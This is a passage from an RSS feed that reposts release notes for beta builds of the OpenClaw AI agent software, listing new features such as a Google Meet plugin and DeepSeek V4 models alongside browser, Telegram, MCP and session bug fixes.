<p>The post <a href="https://www.marktechpost.com/2026/04/25/xai-launches-grok-voice-think-fast-1-0-topping-%CF%84-voice-bench-at-67-3-outperforming-gemini-gpt-realtime-and-more/">xAI Launches grok-voice-think-fast-1.0: Topping τ-voice Bench at 67.3%, Outperforming Gemini, GPT Realtime, and More</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.24-beta.5]]></title>
<description><![CDATA[2026.4.24
Highlights

Google Meet joins OpenClaw as a bundled participant plugin, with personal Google auth, Chrome/Twilio realtime sessions, paired-node Chrome support, artifact/attendance exports, and recovery tooling for already-open Meet tabs.
DeepSeek V4 Flash and V4 Pro are in the bundled c...]]></description>
<link>https://tsecurity.de/de/3464246/downloads/openclaw-2026424-beta5/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3464246/downloads/openclaw-2026424-beta5/</guid>
<pubDate>Sat, 25 Apr 2026 17:15:58 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.24</h2>
<h3>Highlights</h3>
<ul>
<li>Google Meet joins OpenClaw as a bundled participant plugin, with personal Google auth, Chrome/Twilio realtime sessions, paired-node Chrome support, artifact/attendance exports, and recovery tooling for already-open Meet tabs.</li>
<li>DeepSeek V4 Flash and V4 Pro are in the bundled catalog, V4 Flash is the onboarding default, and DeepSeek thinking/replay behavior is fixed for follow-up tool-call turns.</li>
<li>Talk, Voice Call, and Google Meet can use realtime voice loops that consult the full OpenClaw agent for deeper tool-backed answers.</li>
<li>Browser automation gets coordinate clicks, longer default action budgets, per-profile headless overrides, and steadier tab reuse/recovery.</li>
<li>Plugin and model infrastructure is lighter at startup: static model catalogs, manifest-backed model rows, lazy provider dependencies, and external runtime-dependency repair for packaged installs.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Packaged installs: preserve package-root runtime dependencies and their exported subpaths when bundled plugin runtime mirrors fall back to copying shared chunks, fixing Windows npm updates that could fail to load copied <code>dist</code> modules.</li>
<li>Heartbeat: clamp oversized scheduler delays through the shared safe timer helper, preventing <code>every</code> values over Node's timeout cap from becoming a 1 ms crash loop. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327249242" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71414" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71414/hovercard" href="https://github.com/openclaw/openclaw/issues/71414">#71414</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327568262" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71478" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71478/hovercard" href="https://github.com/openclaw/openclaw/pull/71478">#71478</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Telegram: remove the startup persisted-offset <code>getUpdates</code> preflight so polling restarts do not self-conflict before the runner starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295160026" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69304" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69304/hovercard" href="https://github.com/openclaw/openclaw/issues/69304">#69304</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303812517" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69779" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69779/hovercard" href="https://github.com/openclaw/openclaw/pull/69779">#69779</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</li>
<li>Browser/Playwright: ignore benign already-handled route races during guarded navigation so browser-page tasks no longer fail when Playwright tears down a route mid-flight. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289338446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68708" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68708/hovercard" href="https://github.com/openclaw/openclaw/pull/68708">#68708</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Steady-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Steady-ai">@Steady-ai</a>.</li>
<li>Browser/aria snapshots: bind <code>format=aria</code> <code>axN</code> refs to live DOM nodes through backend DOM ids when Playwright is available, so follow-up browser actions can use those refs without timing out. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217034518" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62434" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62434/hovercard" href="https://github.com/openclaw/openclaw/pull/62434">#62434</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MrKipler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MrKipler">@MrKipler</a>.</li>
<li>Telegram: prevent duplicate in-process long pollers for the same bot token and add clearer <code>getUpdates</code> conflict diagnostics for external duplicate pollers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158101646" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56230" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56230/hovercard" href="https://github.com/openclaw/openclaw/issues/56230">#56230</a>.</li>
<li>Browser/Linux: detect Chromium-based installs under <code>/opt/google</code>, <code>/opt/brave.com</code>, <code>/usr/lib/chromium</code>, and <code>/usr/lib/chromium-browser</code> before asking users to set <code>browser.executablePath</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085382761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48563" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48563/hovercard" href="https://github.com/openclaw/openclaw/pull/48563">#48563</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lupuletic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lupuletic">@lupuletic</a>.</li>
<li>Sessions/browser: close tracked browser tabs when idle, daily, <code>/new</code>, or <code>/reset</code> session rollover archives the previous transcript, preventing tabs from leaking past the old session. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jakozloski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jakozloski">@jakozloski</a>.</li>
<li>Sessions/forking: fall back to transcript-estimated parent token counts when cached totals are stale or missing, so oversized thread forks start fresh instead of cloning the full parent transcript. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>OpenAI/Codex: send Codex Responses system prompts through top-level<br>
<code>instructions</code> while preserving the existing native Codex payload controls.</li>
<li>MCP/CLI: retire bundled MCP runtimes at the end of one-shot <code>openclaw agent</code> and <code>openclaw infer model run</code> gateway/local executions, so repeated scripted runs do not accumulate stdio MCP child processes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327469009" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71457" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71457/hovercard" href="https://github.com/openclaw/openclaw/issues/71457">#71457</a>.</li>
<li>OpenAI/Codex image generation: canonicalize legacy <code>openai-codex.baseUrl</code> values such as <code>https://chatgpt.com/backend-api</code> to the Codex Responses backend before calling <code>gpt-image-2</code>, matching the chat transport. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327474967" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71460" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71460/hovercard" href="https://github.com/openclaw/openclaw/issues/71460">#71460</a>.</li>
<li>Control UI: make <code>/usage</code> use the fresh context snapshot for context percentage, and include cache-write tokens in the Usage overview cache-hit denominator. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080148005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47885" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47885/hovercard" href="https://github.com/openclaw/openclaw/issues/47885">#47885</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/imwyvern/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/imwyvern">@imwyvern</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ante042/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ante042">@Ante042</a>.</li>
<li>GitHub Copilot: preserve encrypted Responses reasoning item IDs during replay so Copilot can validate encrypted reasoning payloads across requests. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327393792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71448" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71448/hovercard" href="https://github.com/openclaw/openclaw/pull/71448">#71448</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/a410979729-sys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/a410979729-sys">@a410979729-sys</a>.</li>
<li>Agents/replies: recover final-answer text when streamed assistant chunks contain only whitespace, preventing completed turns from surfacing as empty-payload errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327458962" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71454" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71454/hovercard" href="https://github.com/openclaw/openclaw/issues/71454">#71454</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327500044" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71467" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71467/hovercard" href="https://github.com/openclaw/openclaw/pull/71467">#71467</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Feishu/TTS: transcode voice-intent MP3 and other audio replies to Ogg/Opus before sending native Feishu audio bubbles, while keeping ordinary MP3 attachments as files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206957369" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61249" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61249/hovercard" href="https://github.com/openclaw/openclaw/issues/61249">#61249</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4034320677" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/37868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/37868/hovercard" href="https://github.com/openclaw/openclaw/issues/37868">#37868</a>.</li>
<li>Telegram/webhook: acknowledge validated webhook updates before running bot middleware, keeping slow agent turns from tripping Telegram delivery retries while preserving per-chat processing lanes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326997239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71392" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71392/hovercard" href="https://github.com/openclaw/openclaw/issues/71392">#71392</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joelforsberg46-source/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelforsberg46-source">@joelforsberg46-source</a>.</li>
<li>MCP: retire one-shot embedded bundled MCP runtimes at run end, skip bundle-MCP startup when a runtime tool allowlist cannot reach bundle-MCP tools, and add <code>mcp.sessionIdleTtlMs</code> idle eviction for leaked session runtimes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323105025" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71106" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71106/hovercard" href="https://github.com/openclaw/openclaw/issues/71106">#71106</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323140457" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71110" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71110/hovercard" href="https://github.com/openclaw/openclaw/issues/71110">#71110</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312378990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70389" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70389/hovercard" href="https://github.com/openclaw/openclaw/issues/70389">#70389</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319231374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70808" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70808/hovercard" href="https://github.com/openclaw/openclaw/issues/70808">#70808</a>.</li>
<li>MCP/config reload: hot-apply <code>mcp.*</code> changes by disposing cached session MCP runtimes, and dispose bundled MCP runtimes during gateway shutdown so removed <code>mcp.servers</code> entries reap child processes promptly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203179674" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60656/hovercard" href="https://github.com/openclaw/openclaw/issues/60656">#60656</a>.</li>
<li>Gateway/restart continuation: durably hand restart continuations to a session-delivery queue before deleting the restart sentinel, recover queued continuation work after crashy restarts, and fall back to a session-only wake when no channel route survives reboot. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318942406" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70780" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70780/hovercard" href="https://github.com/openclaw/openclaw/pull/70780">#70780</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>Agents/tool-result pruning: harden the tool-result character estimator and context-pruning loops against malformed <code>{ type: "text" }</code> blocks created by void or undefined tool handler results, serializing non-string text payloads for size accounting so they cannot bypass trimming as zero-sized. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4024106459" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/34979" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/34979/hovercard" href="https://github.com/openclaw/openclaw/issues/34979">#34979</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4110037760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51267" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51267/hovercard" href="https://github.com/openclaw/openclaw/pull/51267">#51267</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cgdusek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cgdusek">@cgdusek</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alvinttang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alvinttang">@alvinttang</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coffeexcoin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coffeexcoin">@coffeexcoin</a>.</li>
<li>Daemon/service-env: add Nix Home Manager profile bin directories to generated gateway service PATHs on macOS and Linux, honoring <code>NIX_PROFILES</code> right-to-left precedence and falling back to <code>~/.nix-profile/bin</code> when unset. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067523684" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44402" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44402/hovercard" href="https://github.com/openclaw/openclaw/issues/44402">#44402</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197325860" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59935" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59935/hovercard" href="https://github.com/openclaw/openclaw/pull/59935">#59935</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jerome-benoit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jerome-benoit">@jerome-benoit</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.24-beta.3]]></title>
<description><![CDATA[2026.4.24
Highlights

Google Meet joins OpenClaw as a bundled participant plugin, with personal Google auth, Chrome/Twilio realtime sessions, paired-node Chrome support, artifact/attendance exports, and recovery tooling for already-open Meet tabs.
DeepSeek V4 Flash and V4 Pro are in the bundled c...]]></description>
<link>https://tsecurity.de/de/3464112/downloads/openclaw-2026424-beta3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3464112/downloads/openclaw-2026424-beta3/</guid>
<pubDate>Sat, 25 Apr 2026 15:45:55 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.24</h2>
<h3>Highlights</h3>
<ul>
<li>Google Meet joins OpenClaw as a bundled participant plugin, with personal Google auth, Chrome/Twilio realtime sessions, paired-node Chrome support, artifact/attendance exports, and recovery tooling for already-open Meet tabs.</li>
<li>DeepSeek V4 Flash and V4 Pro are in the bundled catalog, V4 Flash is the onboarding default, and DeepSeek thinking/replay behavior is fixed for follow-up tool-call turns.</li>
<li>Talk, Voice Call, and Google Meet can use realtime voice loops that consult the full OpenClaw agent for deeper tool-backed answers.</li>
<li>Browser automation gets coordinate clicks, longer default action budgets, per-profile headless overrides, and steadier tab reuse/recovery.</li>
<li>Plugin and model infrastructure is lighter at startup: static model catalogs, manifest-backed model rows, lazy provider dependencies, and external runtime-dependency repair for packaged installs.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Packaged installs: preserve package-root runtime dependencies when bundled plugin runtime mirrors fall back to copying shared chunks, fixing Windows npm updates that could fail to load copied <code>dist</code> modules.</li>
<li>Heartbeat: clamp oversized scheduler delays through the shared safe timer helper, preventing <code>every</code> values over Node's timeout cap from becoming a 1 ms crash loop. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327249242" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71414" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71414/hovercard" href="https://github.com/openclaw/openclaw/issues/71414">#71414</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327568262" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71478" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71478/hovercard" href="https://github.com/openclaw/openclaw/pull/71478">#71478</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Telegram: remove the startup persisted-offset <code>getUpdates</code> preflight so polling restarts do not self-conflict before the runner starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295160026" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69304" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69304/hovercard" href="https://github.com/openclaw/openclaw/issues/69304">#69304</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303812517" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69779" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69779/hovercard" href="https://github.com/openclaw/openclaw/pull/69779">#69779</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</li>
<li>Browser/Playwright: ignore benign already-handled route races during guarded navigation so browser-page tasks no longer fail when Playwright tears down a route mid-flight. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289338446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68708" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68708/hovercard" href="https://github.com/openclaw/openclaw/pull/68708">#68708</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Steady-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Steady-ai">@Steady-ai</a>.</li>
<li>Browser/aria snapshots: bind <code>format=aria</code> <code>axN</code> refs to live DOM nodes through backend DOM ids when Playwright is available, so follow-up browser actions can use those refs without timing out. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217034518" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62434" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62434/hovercard" href="https://github.com/openclaw/openclaw/pull/62434">#62434</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MrKipler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MrKipler">@MrKipler</a>.</li>
<li>Telegram: prevent duplicate in-process long pollers for the same bot token and add clearer <code>getUpdates</code> conflict diagnostics for external duplicate pollers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158101646" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56230" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56230/hovercard" href="https://github.com/openclaw/openclaw/issues/56230">#56230</a>.</li>
<li>Browser/Linux: detect Chromium-based installs under <code>/opt/google</code>, <code>/opt/brave.com</code>, <code>/usr/lib/chromium</code>, and <code>/usr/lib/chromium-browser</code> before asking users to set <code>browser.executablePath</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085382761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48563" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48563/hovercard" href="https://github.com/openclaw/openclaw/pull/48563">#48563</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lupuletic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lupuletic">@lupuletic</a>.</li>
<li>Sessions/browser: close tracked browser tabs when idle, daily, <code>/new</code>, or <code>/reset</code> session rollover archives the previous transcript, preventing tabs from leaking past the old session. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jakozloski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jakozloski">@jakozloski</a>.</li>
<li>Sessions/forking: fall back to transcript-estimated parent token counts when cached totals are stale or missing, so oversized thread forks start fresh instead of cloning the full parent transcript. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>OpenAI/Codex: send Codex Responses system prompts through top-level<br>
<code>instructions</code> while preserving the existing native Codex payload controls.</li>
<li>MCP/CLI: retire bundled MCP runtimes at the end of one-shot <code>openclaw agent</code> and <code>openclaw infer model run</code> gateway/local executions, so repeated scripted runs do not accumulate stdio MCP child processes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327469009" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71457" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71457/hovercard" href="https://github.com/openclaw/openclaw/issues/71457">#71457</a>.</li>
<li>OpenAI/Codex image generation: canonicalize legacy <code>openai-codex.baseUrl</code> values such as <code>https://chatgpt.com/backend-api</code> to the Codex Responses backend before calling <code>gpt-image-2</code>, matching the chat transport. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327474967" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71460" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71460/hovercard" href="https://github.com/openclaw/openclaw/issues/71460">#71460</a>.</li>
<li>Control UI: make <code>/usage</code> use the fresh context snapshot for context percentage, and include cache-write tokens in the Usage overview cache-hit denominator. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080148005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47885" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47885/hovercard" href="https://github.com/openclaw/openclaw/issues/47885">#47885</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/imwyvern/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/imwyvern">@imwyvern</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ante042/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ante042">@Ante042</a>.</li>
<li>GitHub Copilot: preserve encrypted Responses reasoning item IDs during replay so Copilot can validate encrypted reasoning payloads across requests. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327393792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71448" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71448/hovercard" href="https://github.com/openclaw/openclaw/pull/71448">#71448</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/a410979729-sys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/a410979729-sys">@a410979729-sys</a>.</li>
<li>Agents/replies: recover final-answer text when streamed assistant chunks contain only whitespace, preventing completed turns from surfacing as empty-payload errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327458962" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71454" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71454/hovercard" href="https://github.com/openclaw/openclaw/issues/71454">#71454</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327500044" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71467" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71467/hovercard" href="https://github.com/openclaw/openclaw/pull/71467">#71467</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Feishu/TTS: transcode voice-intent MP3 and other audio replies to Ogg/Opus before sending native Feishu audio bubbles, while keeping ordinary MP3 attachments as files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206957369" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61249" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61249/hovercard" href="https://github.com/openclaw/openclaw/issues/61249">#61249</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4034320677" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/37868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/37868/hovercard" href="https://github.com/openclaw/openclaw/issues/37868">#37868</a>.</li>
<li>Telegram/webhook: acknowledge validated webhook updates before running bot middleware, keeping slow agent turns from tripping Telegram delivery retries while preserving per-chat processing lanes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326997239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71392" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71392/hovercard" href="https://github.com/openclaw/openclaw/issues/71392">#71392</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joelforsberg46-source/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelforsberg46-source">@joelforsberg46-source</a>.</li>
